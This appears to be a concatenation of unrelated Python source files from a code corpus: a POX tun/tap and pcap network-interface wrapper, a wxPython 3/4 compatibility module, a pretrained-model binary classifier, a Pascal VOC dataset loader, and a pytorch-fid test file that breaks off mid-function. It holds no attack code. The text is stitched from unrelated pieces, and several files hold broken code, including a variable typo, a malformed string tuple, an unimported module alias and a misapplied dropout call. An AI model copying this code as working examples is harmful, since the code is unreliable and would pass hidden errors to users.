#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Input and output from network interfaces.
This wraps PCap, TunTap, etc., to provide a simple, universal, cooperative
interface to network interfaces.
Currently limited to Linux.
"""
from pox.lib.pxpcap import PCap
from queue import Queue
from pox.lib.revent import Event, EventMixin
from pox.lib.ioworker.io_loop import ReadLoop
from pox.core import core
import struct
from fcntl import ioctl
import socket
from pox.lib.addresses import EthAddr, IPAddr
from pox.lib.addresses import parse_cidr, cidr_to_netmask
import os
import ctypes
IFNAMESIZ = 16
IFREQ_SIZE = 40
# from linux/if_tun.h
TUNSETIFF = 0x400454ca
TUNGETIFF = 0x800454d2
IFF_TUN = 0x0001
IFF_TAP = 0x0002
IFF_NO_PI = 0x1000
IFF_ONE_QUEUE = 0x2000
IFF_VNET_HDR = 0x4000
IFF_TUN_EXCL = 0x8000
IFF_MULTI_QUEUE = 0x0100
IFF_ATTACH_QUEUE = 0x0200
IFF_DETACH_QUEUE = 0x0400
IFF_PERSIST = 0x0800
IFF_NOFILTER = 0x1000
#from linux/if.h (flags)
IFF_UP = 1<<0
IFF_BROADCAST = 1<<1
IFF_DEBUG = 1<<2
IFF_LOOPBACK = 1<<3
IFF_POINTOPOINT = 1<<4
IFF_NOTRAILERS = 1<<5
IFF_RUNNING = 1<<6
IFF_NOARP = 1<<7
IFF_PROMISC = 1<<8
IFF_ALLMULTI = 1<<9
IFF_MASTER = 1<<10
IFF_SLAVE = 1<<11
IFF_MULTICAST = 1<<12
IFF_PORTSEL = 1<<13
IFF_AUTOMEDIA = 1<<14
IFF_DYNAMIC = 1<<15
IFF_LOWER_UP = 1<<16
IFF_DORMANT = 1<<17
IFF_ECHO = 1<<18
# Unless IFF_NO_PI, there's a header on packets:
# 16 bits of flags
# 16 bits (big endian?) protocol number
# from /usr/include/linux/sockios.h
SIOCGIFHWADDR = 0x8927
SIOCGIFMTU = 0x8921
SIOCSIFMTU = 0x8922
SIOCGIFFLAGS = 0x8913
SIOCSIFFLAGS = 0x8914
SIOCSIFHWADDR = 0x8924
SIOCGIFNETMASK = 0x891b
SIOCSIFNETMASK = 0x891c
SIOCGIFADDR = 0x8915
SIOCSIFADDR = 0x8916
SIOCGIFBRDADDR = 0x8919
SIOCSIFBRDADDR = 0x891a
SIOCSIFNAME = 0x8923
SIOCADDRT = 0x890B # rtentry (route.h) for IPv4, in6_rtmsg for IPv6
SIOCDELRT = 0x890C
# from /usr/include/linux/if_arp.h
ARPHRD_ETHER = 1
ARPHRD_IEEE802 = 1
ARPHRD_IEEE1394 = 24
ARPHRD_EUI64 = 27
ARPHRD_LOOPBACK = 772
ARPHRD_IPGRE = 778
ARPHRD_IEE802_TR = 800
ARPHRD_IEE80211 = 801
ARPHRD_IEE80211_PRISM = 802
ARPHRD_IEE80211_RADIOTAP = 803
ARPHRD_IP6GRE = 823
class rtentry (object):
"""
Wrapper for Linux rtentry
Only tries to capture IPv4 usage.
Possibly better done with ctypes.
"""
# flags
RTF_UP = 0x0001 # usable
RTF_GATEWAY = 0x0002 # dst is gateway
RTF_HOST = 0x0004 # host route
RTF_REINSTATE = 0x0008 # reinstate after timeout
RTF_DYNAMIC = 0x0010 # created dynamically (by redirect)
RTF_MODIFIED = 0x0020 # modified dynamically (by redirect)
RTF_MSS = 0x0040 # use specific MSS for this route
RTF_WINDOW = 0x0080 # use per-route window clamping
RTF_IRTT = 0x0100 # use initial RTT
RTF_REJECT = 0x0200 # reject route
# fields
rt_hash = 0
rt_dst = IPAddr("0.0.0.0")
rt_gateway = IPAddr("0.0.0.0")
rt_genmask = IPAddr("0.0.0.0")
rt_flags = 0
rt_refcnt = 0
rt_use = 0
rt_ifp = 0 # ptr to struct ifnet
rt_metric = 0
rt_dev = None # device name
rt_mss = 0
rt_window = 0 # window clamping
rt_irtt = 0 # initial RTT
def pack (self):
if self.rt_dev:
s = ctypes.c_char_p(self.rt_dev + "\0") # Null terminator necessary?
dev = ctypes.cast(s, ctypes.c_void_p).value
self._buf = s # You must use the resulting packed string before changing
# rt_dev!
else:
dev = 0
return struct.pack("L16s16s16shhLPhPLLH",
self.rt_hash,
sockaddr_in(self.rt_dst).pack(),
sockaddr_in(self.rt_gateway).pack(),
sockaddr_in(self.rt_genmask).pack(),
self.rt_flags,
self.rt_refcnt,
self.rt_use,
self.rt_ifp,
self.rt_metric,
dev,
self.rt_mss,
self.rt_window,
self.rt_irtt)
class sockaddr_in (object):
"""
Wrapper for sockaddr_in
"""
sin_family = socket.AF_INET
sin_port = 0
sin_addr = IPAddr("0.0.0.0")
def __init__ (self, addr=None, port=None):
if addr is not None:
self.sin_addr = IPAddr(addr)
if port is not None:
self.sin_port = port
def pack (self):
r = struct.pack("hH", self.sin_family, self.sin_port)
r += self.sin_addr.raw
r += ("\0" * 8)
return r
class Interface (object):
"""
Simple interface to tun/tap driver
Currently only for Linux. IIRC, shouldn't be too hard to adapt for BSD.
Other OSes will probably need a fair amount of work.
"""
#TODO: Setters
def __init__ (self, name):
self._name = name
def __str__ (self):
return "%s('%s')" % (type(self).__name__, self.name)
@property
def name (self):
return self._name.rstrip("\0")
@name.setter
def name (self, value):
if len(value) > IFNAMESIZ: raise RuntimeError("Name too long")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += value
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFNAME, ifr)
self._name = value
@property
def ipv6_enabled (self):
f = file("/proc/sys/net/ipv6/conf/%s/disable_ipv6" % (self.name,), "r")
with f:
return f.read()[0] == "0" # Note inversion!
@ipv6_enabled.setter
def ipv6_enabled (self, value):
f = file("/proc/sys/net/ipv6/conf/%s/disable_ipv6" % (self.name,), "w")
with f:
f.write("0" if value else "1") # Note inversion!
@property
def ip_forwarding (self):
f = file("/proc/sys/net/ipv4/conf/%s/forwarding" % (self.name,), "r")
with f:
return f.read()[0] == "1"
@ip_forwarding.setter
def ip_forwarding (self, value):
f = file("/proc/sys/net/ipv4/conf/%s/forwarding" % (self.name,), "w")
with f:
f.write("1" if value else "0")
@property
def mtu (self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCGIFMTU, ifr)
return struct.unpack("I", ret[IFNAMESIZ:][:4])[0]
@mtu.setter
def mtu (self, value):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sI", self.name, value)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFMTU, ifr)
@property
def flags (self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCGIFFLAGS, ifr)
return struct.unpack("H", ret[IFNAMESIZ:IFNAMESIZ+2])[0]
@flags.setter
def flags (self, value):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sH", self.name, value)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFFLAGS, ifr)
def set_flags (self, flags, on=True):
if on:
self.flags |= flags
else:
self.unset_flags(flags)
def unset_flags (self, flags):
self.flags = self.flags & (flags ^ 0xffFF)
@property
def promiscuous (self):
return bool(self.flags & IFF_PROMISC)
@promiscuous.setter
def promiscuous (self, value):
self.set_flags(IFF_PROMISC, value)
@property
def is_up (self):
return (self.flags & IFF_UP) != 0
@is_up.setter
def is_up (self, value):
self.set_flags(IFF_UP, value)
@property
def is_running (self):
return (self.flags & IFF_RUNNING) != 0
@property
def arp_enabled (self):
return (self.flags & IFF_NOARP) == 0
@arp_enabled.setter
def arp_enabled (self, value):
self.set_flags(IFF_NOARP, not value)
@property
def ip_addr (self):
try:
return self._ioctl_get_ipv4(SIOCGIFADDR)
except IOError as e:
if e.errno == 99: return None
raise
@ip_addr.setter
def ip_addr (self, value):
return self._ioctl_set_ipv4(SIOCSIFADDR, value)
@property
def netmask (self):
try:
return self._ioctl_get_ipv4(SIOCGIFNETMASK)
except IOError as e:
if e.errno == 99: return None
raise
@netmask.setter
def netmask (self, value):
return self._ioctl_set_ipv4(SIOCSIFNETMASK, value)
@property
def broadcast_addr (self):
try:
return self._ioctl_get_ipv4(SIOCGIFBRDADDR)
except IOError as e:
if e.errno == 99: return None
raise
@broadcast_addr.setter
def broadcast_addr (self, value):
return self._ioctl_set_ipv4(SIOCSIFBRDADDR, value)
@property
def eth_addr (self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCGIFHWADDR, ifr)
sa = ret[IFNAMESIZ:] # sockaddr
return self._get_eth(sa)
@eth_addr.setter
def eth_addr (self, value):
value = EthAddr(value).raw
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sH", self.name, ARPHRD_ETHER)
ifr += value # Append to sockaddr
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFHWADDR, ifr)
def _ioctl_get_ipv4 (self, which):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, which, ifr)
return self._get_ipv4(ret[IFNAMESIZ:])
def _ioctl_set_ipv4 (self, which, value):
value = IPAddr(value)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sHHI", self.name, socket.AF_INET, 0,
value.toUnsigned(networkOrder=True))
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, which, ifr)
@staticmethod
def _get_ipv4 (sa):
sa_family = struct.unpack("H", sa[:2])[0]
if sa_family == socket.AF_INET:
return IPAddr(sa[4:8])
else:
raise RuntimeError("Unsupported hardware type %s for %s (expected %s)"
% (sa_family, self, socket.AF_INET))
@staticmethod
def _get_eth (sa):
sa_family = struct.unpack("H", sa[:2])[0]
if sa_family == ARPHRD_ETHER:
return EthAddr(sa[2:8])
else:
raise RuntimeError("Unsupported hardware type %s (expected %s)"
% (sa_family, ARPHRD_ETHER))
def add_default_route (self, *args, **kw):
return self.add_route("0.0.0.0/0", *args, **kw)
def add_route (self, network, gateway=None, dev=(), metric=0):
"""
Add routing table entry
If dev is unspecified, it defaults to this device
"""
return self._add_del_route(network, gateway, dev, metric, SIOCADDRT)
def del_route (self, network, gateway=None, dev=(), metric=0):
"""
Remove a routing table entry
If dev is unspecified, it defaults to this device
"""
return self._add_del_route(network, gateway, dev, metric, SIOCDELRT)
def _add_del_route (self, network, gateway=None, dev=(), metric=0,
command=None):
"""
Add or remove a routing table entry
If dev is unspecified, it defaults to this device
"""
r = rtentry()
if isinstance(network, tuple):
addr,mask = network
addr = str(addr)
if isinstance(mask, int):
mask = cidr_to_netmask(mask)
mask = str(mask)
network = "%s/%s" % (addr,mask)
host = False
if isinstance(network, IPAddr) or (isinstance(network, str)
and "/" not in network):
host = True
network,bits = parse_cidr(network)
r.rt_dst = network
r.rt_genmask = cidr_to_netmask(bits)
if gateway is not None:
r.rt_gateway = IPAddr(gateway)
r.rt_flags |= r.RTF_GATEWAY
r.rt_metric = metric
if dev is (): dev = self
if isinstance(dev, Interface): dev = dev.name
if dev: r.rt_dev = dev
if host: r.rt_flags |= r.RTF_HOST
r.rt_flags |= r.RTF_UP
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
rv = ioctl(sock, command, r.pack())
class TunTap (object):
"""
Simple wrapper for tun/tap interfaces
Looks like a file-like object. You should be able to read/write it, select
on it, etc.
"""
def __init__ (self, name=None, tun=False, raw=False):
"""
Create tun or tap
By default, it creates a new tun or tap with a default name. If you
specify a name, it will either try to create it (if it doesn't exist),
or try to use an existing interface (for which you must have permission).
Defaults to tap (Ethernet) mode. Specify tun=True for tun (IP) mode.
Specify raw=True to skip the 32 bits of flag/protocol metadata.
"""
if name is None: name = ""
openflags = os.O_RDWR
try:
openflow |= os.O_BINARY
except:
pass
self._f = os.open("/dev/net/tun", openflags)
# an ifreq is IFREQ_SIZE bytes long, starting with an interface name
# (IFNAMESIZ bytes) followed by a big union.
self.is_tun = tun
self.is_tap = not tun
self.is_raw = raw
flags = 0
if tun: flags |= IFF_TUN
else: flags |= IFF_TAP
if raw: flags |= IFF_NO_PI
ifr = struct.pack(str(IFNAMESIZ) + "sH", name, flags)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(self.fileno(), TUNSETIFF, ifr)
self.name = ret[:IFNAMESIZ]
iflags = flags
ifr = struct.pack(str(IFNAMESIZ) + "sH", name, 0)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(self.fileno(), TUNGETIFF, ifr)
flags = struct.unpack("H", ret[IFNAMESIZ:IFNAMESIZ+2])[0]
self.is_tun = (flags & IFF_TUN) == IFF_TUN
self.is_tap = not self.is_tun
#self.is_raw = (flags & IFF_NO_PI) == IFF_NO_PI
def fileno (self):
return self._f
def write (self, data):
return os.write(self.fileno(), data)
def read (self, n):
return os.read(self.fileno(), n)
def close (self):
return os.close(self.fileno())
@property
def eth_addr (self):
return Interface(self.name).eth_addr
class RXData (Event):
"""
Event fired when an interface receives data
"""
def __init__ (self, interface, data):
self.interface = interface
self.data = data
class PCapInterface (Interface, EventMixin):
_eventMixin_events = set([
RXData,
])
def __init__ (self, name):
Interface.__init__(self, name)
EventMixin.__init__(self)
self._q = Queue()
p = PCap(name, callback=self._pcap_cb, start=False)
p.set_direction(True, False) # Incoming, not outgoing
p.start()
self.pcap = p
core.add_listener(self._handle_GoingDownEvent)
def _handle_GoingDownEvent (self, event):
self.close()
def send (self, data):
if self.pcap is None: return
self.pcap.inject(data)
def _pcap_cb (self, obj, data, sec, usec, length):
"""
Handles incoming data from pcap
This may not be on the right thread, so we just push it to a thread-safe
queue and poke the cooperative thread, which will pop it later.
"""
do_read = self._q.empty()
self._q.put((obj,data))
if do_read: core.callLater(self._queue_read)
def _queue_read (self):
anything = False
for _ in range(10): # as most X at once
try:
data = self._q.get(False)
self._q.task_done()
anything = True
except:
break
pcap,data = data
self.raiseEventNoErrors(RXData, self, data)
if anything:
# Check for remainders later
core.callLater(self._queue_read)
def __del__ (self):
self.close()
def close (self):
if self.pcap:
self.pcap.close()
self.pcap = None
class TapInterface (Interface, EventMixin):
_eventMixin_events = set([
RXData,
])
io_loop = None
max_read_size = 1600
default_send_protocol = None
def __init__ (self, name="", tun=False, raw=False, protocol=None):
self.tap = None
self.last_flags = None
self.last_protocol = None
if protocol: self.default_send_protocol = protocol
self.io_loop = ReadLoop.singleton
Interface.__init__(self, name)
EventMixin.__init__(self)
self.tap = TunTap(name, raw=raw, tun=tun)
if not name: self._name = self.tap.name
self.io_loop.add(self)
@property
def is_tap (self):
return self.tap.is_tap
@property
def is_tun (self):
return self.tap.is_tun
def send (self, data, flags=0, protocol=None):
if not self.tap.is_raw:
if protocol is None: protocol = self.default_send_protocol or 0
#FIXME: In the "0" case above, should we fall back to using the Etherype
# in the packet?
if flags or protocol:
flags = struct.pack("!HH", flags, protocol) # Flags reversed?
else:
flags = "\0\0\0\0"
data = flags + data
self.tap.write(data)
def _do_rx (self):
data = self.tap.read(self.max_read_size)
if not self.tap.is_raw:
flags,proto = struct.unpack("!HH", data[:4])
#FIXME: This may invert the flags...
self.last_flags = flags
self.last_protocol = proto
data = data[4:] # Cut off header
self.raiseEvent(RXData, self, data)
def fileno (self):
# Support fileno so that this can be used in IO loop directly
return self.tap.fileno()
def close (self):
if self.tap:
self.tap.close()
self.tap = None
self.io_loop.remove(self)
def __del__ (self):
self.close()
|
wxtbx/wx4_compatibility.py | dperl-sol/cctbx_project | 155 | 17167 | <filename>wxtbx/wx4_compatibility.py
from __future__ import absolute_import, division, print_function
'''
Author : Lyubimov, A.Y.
Created : 04/14/2014
Last Changed: 11/05/2018
Description : wxPython 3-4 compatibility tools
The context managers, classes, and other tools below can be used to make the
GUI code compatible with wxPython 3 and 4. Mostly, the tools convert the
functions, enumerations, and classes which have been renamed in wxPython 4;
the name mismatches result in exceptions.
Use case 1: subclassing wx.PyControl or wx.Control:
from wxtbx import wx4_compatibility as wx4c
WxCtrl = wx4c.get_wx_mod(wx, wx.Control)
class MyCustomControl(WxCtrl): ...
Use case 2: brush style (NOTE: you can do that with fonts as well, but it
doesn't seem to be necessary):
from wxtbx import wx4_compatibility as wx4c
bkgrd = self.GetBackgroundColour()
with wx4c.set_brush_style(wx.BRUSHSTYLE_SOLID) as bstyle:
brush = wx.Brush(bkgrd, bstyle)
Use case 3: Toolbars
from wxtbx import wx4_compatibility as wx4c, bitmaps
class MyFrame(wx.Frame):
def __init__(self, parent, id, title, *args, **kwargs):
wx.Frame.__init__(self, parent, id, title, *args, **kwargs)
self.toolbar = wx4c.ToolBar(self, style=wx.TB_TEXT)
self.quit_button = self.toolbar.AddTool(toolId=wx.ID_ANY,
label='Quit',
kind=wx.ITEM_NORMAL,
bitmap=bitmaps.fetch_icon_bitmap('actions', 'exit')
shortHelp='Exit program')
...
self.SetToolBar(self.toolbar)
self.toolbar.Realize()
'''
import wx
from contextlib import contextmanager
import importlib
wx4 = wx.__version__[0] == '4'
modnames = [
('PyControl', 'Control'),
('PyDataObjectSimple', 'DataObjectSimple'),
('PyDropTarget', 'DropTarget'),
('PyEvtHandler', 'EvtHandler'),
('PyImageHandler', 'ImageHandler'),
('PyLocale', 'Locale'),
('PyLog', 'Log'),
('PyPanel', 'Panel'),
('PyPickerBase', 'PickerBase'),
('PyPreviewControlBar', 'PreviewControlBar'),
('PyPreviewFrame', 'PreviewFrame'),
('PyPrintPreview', 'PrintPreview'),
('PyScrolledWindow', 'ScrolledWindow'),
('PySimpleApp', 'App'),
('PyTextDataObject', 'TextDataObject'),
('PyTimer', 'Timer'),
('PyTipProvider', 'adv.TipProvider'),
('PyValidator', 'Validator'),
('PyWindow'', Window')
]
font_families = [
(wx.DEFAULT, wx.FONTFAMILY_DEFAULT),
(wx.DECORATIVE, wx.FONTFAMILY_DECORATIVE),
(wx.ROMAN, wx.FONTFAMILY_ROMAN),
(wx.SCRIPT, wx.FONTFAMILY_SCRIPT),
(wx.SWISS, wx.FONTFAMILY_SWISS),
(wx.MODERN, wx.FONTFAMILY_MODERN),
(wx.TELETYPE, wx.FONTFAMILY_TELETYPE)
]
font_weights = [
(wx.NORMAL, wx.FONTWEIGHT_NORMAL),
(wx.LIGHT, wx.FONTWEIGHT_LIGHT),
(wx.BOLD, wx.FONTWEIGHT_BOLD)
]
font_styles = [
(wx.NORMAL, wx.FONTSTYLE_NORMAL),
(wx.ITALIC, wx.FONTSTYLE_ITALIC),
(wx.SLANT, wx.FONTSTYLE_SLANT)
]
pen_styles = [
(wx.SOLID, wx.PENSTYLE_SOLID),
(wx.DOT, wx.PENSTYLE_DOT),
(wx.LONG_DASH, wx.PENSTYLE_LONG_DASH),
(wx.SHORT_DASH, wx.PENSTYLE_SHORT_DASH),
(wx.DOT_DASH, wx.PENSTYLE_DOT_DASH),
(wx.USER_DASH, wx.PENSTYLE_USER_DASH),
(wx.TRANSPARENT, wx.PENSTYLE_TRANSPARENT)
]
brush_styles = [
(wx.SOLID, wx.BRUSHSTYLE_SOLID),
(wx.TRANSPARENT, wx.BRUSHSTYLE_TRANSPARENT),
(wx.STIPPLE_MASK_OPAQUE, wx.BRUSHSTYLE_STIPPLE_MASK_OPAQUE),
(wx.STIPPLE_MASK, wx.BRUSHSTYLE_STIPPLE_MASK),
(wx.STIPPLE, wx.BRUSHSTYLE_STIPPLE),
(wx.BDIAGONAL_HATCH, wx.BRUSHSTYLE_BDIAGONAL_HATCH),
(wx.CROSSDIAG_HATCH, wx.BRUSHSTYLE_CROSSDIAG_HATCH),
(wx.FDIAGONAL_HATCH, wx.BRUSHSTYLE_FDIAGONAL_HATCH),
(wx.CROSS_HATCH, wx.BRUSHSTYLE_CROSS_HATCH),
(wx.HORIZONTAL_HATCH, wx.BRUSHSTYLE_HORIZONTAL_HATCH),
(wx.VERTICAL_HATCH, wx.BRUSHSTYLE_VERTICAL_HATCH),
]
def find_module(module):
for m in modnames:
if module.__name__ in m:
return m
def find_enum(enums, item):
for en in enums:
if item in en:
value = en[1] if wx4 else en[0]
return value
def get_wx_mod(base, module):
mname = find_module(module)[1] if wx4 else find_module(module)[0]
bname = base.__name__
if '.' in mname:
spl = [i for i in mname.split('.') if i != bname]
modname = '.'.join(spl[:-1])
mod = importlib.import_module('{}.{}'.format(bname, modname))
return getattr(mod, spl[-1])
else:
return getattr(base, mname)
@contextmanager
def wx_mod(base, module):
''' Identify and import the appropriate wxPython module '''
yield get_wx_mod(base, module)
@contextmanager
def set_font_style(style):
yield find_enum(font_styles, style)
@contextmanager
def set_font_weight(weight):
yield find_enum(font_weights, weight)
@contextmanager
def set_font_family(family):
yield find_enum(font_families, family)
@contextmanager
def set_pen_style(style):
yield find_enum(pen_styles, style)
@contextmanager
def set_brush_style(style):
yield find_enum(brush_styles, style)
@contextmanager
def create_measuring_context():
dc = wx.GraphicsContext.Create() if wx4 else \
wx.GraphicsContext.CreateMeasuringContext()
yield dc
class Wx3ToolBar(wx.ToolBar):
''' Special toolbar class that accepts wxPython 4-style AddTool command and
converts it to a wxPython 3-style AddLabelTool command '''
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.TB_HORIZONTAL, name='toolbar'):
wx.ToolBar.__init__(self, parent, id, pos, size, style, name)
def AddTool(self, toolId, label, bitmap, bmpDisabled=wx.NullBitmap,
kind=wx.ITEM_NORMAL, shortHelp='', longHelp='',
clientData=None):
''' Override to make this a very thin wrapper for AddLabelTool, which in
wxPython 3 is the same as AddTool in wxPython 4 '''
return self.AddLabelTool(id=toolId, label=label, bitmap=bitmap,
bmpDisabled=bmpDisabled, kind=kind,
shortHelp=shortHelp, longHelp=longHelp,
clientData=clientData)
class Wx4ToolBar(wx.ToolBar):
''' Special toolbar class that accepts wxPython 3-style AddLabelTool command
and converts it to a wxPython 4-style AddTool command '''
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.TB_HORIZONTAL, name='toolbar'):
wx.ToolBar.__init__(self, parent, id, pos, size, style, name)
def AddLabelTool(self, id, label, bitmap, bmpDisabled=wx.NullBitmap,
kind=wx.ITEM_NORMAL, shortHelp='', longHelp='',
clientData=None):
''' Override to make this a very thin wrapper for AddTool, which in
wxPython 4 is the same as AddLabelTool in wxPython 3 '''
return self.AddTool(toolId=id, label=label, bitmap=bitmap,
bmpDisabled=bmpDisabled, kind=kind,
shortHelp=shortHelp, longHelp=longHelp,
clientData=clientData)
# Use this ToolBar class to create toolbars in frames
ToolBar = Wx4ToolBar if wx4 else Wx3ToolBar
|
projects/TGS_salt/binary_classifier/model.py | liaopeiyuan/ml-arsenal-public | 280 | 17178 | <filename>projects/TGS_salt/binary_classifier/model.py
import torch.nn as nn
import pretrainedmodels
class classifier(nn.Module):
def __init__(self, model_name='resnet32'):
super(classifier, self).__init__()
# Load pretrained ImageNet model
self.model = pretrainedmodels.__dict__[model_name](num_classes=1000, pretrained='imagenet')
print(model_name + ' model settings:')
for var in pretrainedmodels.pretrained_settings[model_name]['imagenet']:
print('\t' + var + ': '+ str(pretrainedmodels.pretrained_settings[model_name]['imagenet'][var]))
# Define last layer for fine-tuning
dim_feats = self.model.last_linear.in_features
nb_classes = 1
self.model.last_linear = F.dropout2d(nn.Linear(dim_feats, nb_classes),p=0.50)
def forward(self, input):
return self.model(input)
def set_mode(self, mode):
self.mode = mode
if 'validation' in mode or 'test' in mode:
self.eval()
elif 'train' in mode:
self.train()
else:
raise NotImplementedError
|
datasets/voc_dataset.py | ming71/DAL | 206 | 17180 | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by <NAME>
# Extended by <NAME>
# --------------------------------------------------------
import os
import cv2
import numpy as np
import torch
import torch.utils.data as data
import xml.etree.ElementTree as ET
from utils.bbox import quad_2_rbox
class VOCDataset(data.Dataset):
""""""
def __init__(self,
dataset='trainval.txt',
augment = False,
level = 1,
random_flip=True):
self.image_set = dataset
self.data_path = self.image_set.strip('/ImageSets/Main/trainval.txt')
self.image_ext = [".jpg"]
self.image_list = self._load_image_names()
self.classes = ('__background__', 'aeroplane','bicycle','bird','boat',
'bottle','bus','car','cat','chair','cow','diningtable',
'dog','horse','motorbike','person','pottedplant',
'sheep','sofa','train','tvmonitor')
self.num_classes = len(self.classes)
self.class_to_ind = dict(zip(self.classes, range(self.num_classes)))
self.random_flip = random_flip
def __len__(self):
return len(self.image_list)
def __getitem__(self, index):
im_path = self._image_path_from_index(self.image_list[index])
im = cv2.cvtColor(cv2.imread(im_path, cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
roidb = self._load_pascal_annotation(self.image_list[index])
gt_inds = np.where(roidb['gt_classes'] != 0)[0]
bboxes = roidb['boxes'][gt_inds, :]
classes = roidb['gt_classes'][gt_inds]
if self.random_flip and np.random.rand() >= 0.5:
im = cv2.flip(im, 1, None)
oldxs = bboxes[:, 0::2].copy()
bboxes[:, 0::2] = im.shape[1] - oldxs - 1
gt_boxes = np.empty((len(gt_inds), 6), dtype=np.float32)
for i, bbox in enumerate(bboxes):
gt_boxes[i, :5] = quad_2_rbox(np.array(bbox))
gt_boxes[i, 5] = classes[i]
return {'image': im, 'boxes': gt_boxes}
def _load_image_names(self):
"""
Load the names listed in this dataset's image set file.
"""
image_set_file = self.image_set
if not os.path.exists(image_set_file):
'Path does not exist: {}'.format(image_set_file)
image_names = []
else:
with open(image_set_file) as f:
image_names = [x.strip() for x in f.readlines()]
return image_names
def _image_path_from_index(self, index):
"""
Construct an image path from the image's "index" identifier.
"""
image_path = None
image_exist = False
for image_ext in self.image_ext:
image_path = os.path.join(self.data_path, 'JPEGImages', index + image_ext)
if os.path.exists(image_path):
image_exist = True
break
if not image_exist:
raise Exception('Image path does not exist: {}'.format(
os.path.join(self.data_path, 'JPEGImages', index))
)
return image_path
def _load_pascal_annotation(self, index):
"""
Load image and bounding boxes info from XML file in the PASCAL VOC format.
"""
filename = os.path.join(self.data_path, 'Annotations', index + '.xml')
tree = ET.parse(filename)
objs = tree.findall('object')
boxes, gt_classes = [], []
for _, obj in enumerate(objs):
difficult = int(obj.find('difficult').text)
is_latin = obj.find('language') is None or obj.find('language').text == 'Latin'
bnd_box = obj.find('bndbox')
box = [
float(bnd_box.find('xmin').text),
float(bnd_box.find('ymin').text),
float(bnd_box.find('xmax').text),
float(bnd_box.find('ymin').text),
float(bnd_box.find('xmax').text),
float(bnd_box.find('ymax').text),
float(bnd_box.find('xmin').text),
float(bnd_box.find('ymax').text),
]
label = self.class_to_ind[obj.find('name').text.lower().strip()]
if difficult:
continue
# if self.only_latin and not is_latin:
# continue
boxes.append(box)
gt_classes.append(label)
return {'boxes': np.array(boxes, dtype=np.int32), 'gt_classes': np.array(gt_classes)}
def image_path_at(self, i):
"""
Return the absolute path to image i in the image sequence.
"""
return self._image_path_from_index(self.image_list[i])
def return_class(self, id):
id = int(id)
return self.classes[id]
if __name__ == '__main__':
pass |
tests/test_fid_score.py | jwblangley/pytorch-fid | 1,732 | 17226 | <filename>tests/test_fid_score.py
import numpy as np
import pytest
import torch
from PIL import Image
from pytorch_fid import fid_score, inception
@pytest.fixture
def device():
return torch.device('cpu')
def test_calculate_fid_given_statistics(mocker, tmp_path, device):
dim = 2048
m1, m2 = np.zeros((dim,)), np.ones((dim,))
sigma = np.eye(dim)
def dummy_statistics(path, model, batch_size, dims, device, num_workers):
if path.endswith('1'):
return m1, sigma
elif path.endswith('2'):
return m2, sigma
else:
raise ValueError
mocker.patch('pytorch_fid.fid_score.compute_statistics_of_path',
side_effect=dummy_statistics)
dir_names = ['1', '2']
paths = []
for name in dir_names:
path = tmp_path / name
path.mkdir()
paths.append(str(path))
fid_value = fid_score.calculate_fid_given_paths(paths,
batch_size=dim,
device=device,
dims=dim,
num_workers=0)
# Given equal covariance, FID is just the squared norm of difference
assert fid_value == np.sum((m1 - m2)**2)
def test_compute_statistics_of_path(mocker, tmp_path, device):
model = mocker.MagicMock(inception.InceptionV3)()
model.side_effect = lambda inp: [inp.mean(dim=(2, 3), keepdim=True)]
size = (4, 4, 3)
arrays = [np.zeros(size), np.ones(size) * 0.5, np.ones(size)]
images = [(arr * 255).astype(np.uint8) for arr in arrays]
paths = []
for idx, image in enumerate(images):
paths.append(str(tmp_path / '{}.png'.format(idx)))
Image.fromarray(image, mode='RGB').save(paths[-1])
stats = fid_score.compute_statistics_of_path(str(tmp_path), model,
batch_size=len(images),
dims=3,
device=device,
num_workers=0)
assert np.allclose(stats[0], np.ones((3,)) * 0.5, atol=1e-3)
assert np.allclose(stats[1], np.ones((3, 3)) * 0.25)
def test_compute_statistics_of_path_from_file(mocker, tmp_path, device):
model = mocker.MagicMock(inception.InceptionV3)()
mu = np.random.randn(5)
sigma = np.random.randn(5, 5)
path = tmp_path / 'stats.npz'
with path.open('wb') as f:
